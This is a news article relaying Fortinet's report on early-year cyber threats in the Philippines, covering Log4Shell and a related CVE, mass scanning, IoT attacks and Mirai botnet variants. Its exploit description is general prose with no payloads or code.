The Philippines continues to experience cyber threats that can pose a problem on the Internet, applications and devices during the first quarter of the year.
Fortinet shared that a zero-day vulnerability officially labeled as CVE-2021-44228 or popularly known as log4Shell was discovered in the Apache software, the maker of log4j. It has the potential for a wide-scale impact across most Java applications, including business systems that record log information. This zero-day exploit, which was first discovered on December 9, 2021 in the Java logging library log4j (version 2), was one of the most detected exploitation techniques in the Philippines.
This vulnerability should be taken seriously as this is trivial to exploit or easy to perform but it could permit a remote attacker to execute a complete remote code execution (RCE) on vulnerable systems when exploited. The ubiquitous nature of Log4j is part of what makes CVE-2021-44228 so dangerous. Millions of applications such as iCloud, Steam, an Minecraft, use Log4j for logging. An attacker simply needs to get the app to log a special string to successfully exploit this vulnerability. So far, these cloud services and applications have all been found vulnerable.
Fortinet describes how the exploit work. Once a target has been selected, an attacker adds a JNDI query to a connection request to that target in a field that likely to get logged via Log4j. A vulnerable version of Log4j then takes that request and attempts to contact ‘malicious-server host’ with an LDAP query. Should the connection be successful, the ‘malicious-server hosts’ under the attackers control replies to the query by inserting a malicious Java class file location into the directory data. The Java implementation on the target then downloads the malicious Java class file and executes it.
The log4Shell can potentially compromise millions of devices across the Internet. In light of this, FortiGuard Labs released the IPS signature “Apache Log4j Error Log Remote Code Execution” to detect and mitigate exploit attempts, which was initially released in the IPS version 19.215 package.
The second vulnerability, labeled CVE-2021-45046 causes a Denial of Service (DoS) condition when successfully exploited. Threat actors wasted no time in leveraging Log4Shell by deploying new malware and potentially unwanted programs (PUPs) to compromise vulnerable machines. It was revealed that an information leak and remote code execution in some environments and local code execution in all environments could be achieved due to successful exploitation.
In addition, a considerable increase in massive scans was detected, which allows an adversary to identify services in the target system and carry out further attack based on their findings. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols. FortiLabs also detected many attacks related to Remote Code Execution on IoT devices and home routers which allow the adversary to gain control over vulnerable systems.
Meanwhile, Mirai continues to be the Botnet campaign that registers the most activity in the Philippines. Mirai is a Linux IoT malware that causes infected machines to join a botnet (T1584 005) [16] used for Distributed Denial of Service (DDoS) attacks. However, FortiLabs is aware of a new variant of Mirai Linux spreading using the CVE-2021-44228 vulnerability known as Log4Shell. This is possibly the first Mirai variant equipped with embedded Log4Shell exploit code along with a Mirai variant as the vulnerability was disclosed on December 9, 2021.
